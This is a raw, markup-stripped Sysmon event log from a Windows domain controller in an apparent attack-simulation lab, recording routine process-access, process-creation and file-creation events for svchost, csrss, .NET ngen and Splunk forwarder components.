13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C4-6000-B702-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C4-6000-B702-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.672{08A6967A-45C4-6000-B702-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.500{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C4-6000-B602-000000009A01}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.484{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45C4-6000-B602-000000009A01}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.484{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C4-6000-B602-000000009A01}2256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.328{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C4-6000-B502-000000009A01}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.312{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45C4-6000-B502-000000009A01}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.312{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C4-6000-B502-000000009A01}4700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.312{08A6967A-45C4-6000-B402-000000009A01}49203772C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:16.219{08A6967A-45C2-6000-B202-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c8-0\System.Speech.dll2021-01-14 13:23:16.219 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C4-6000-B402-000000009A01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C4-6000-B402-000000009A01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.156{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C4-6000-B402-000000009A01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.016{08A6967A-45C4-6000-B402-000000009A01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 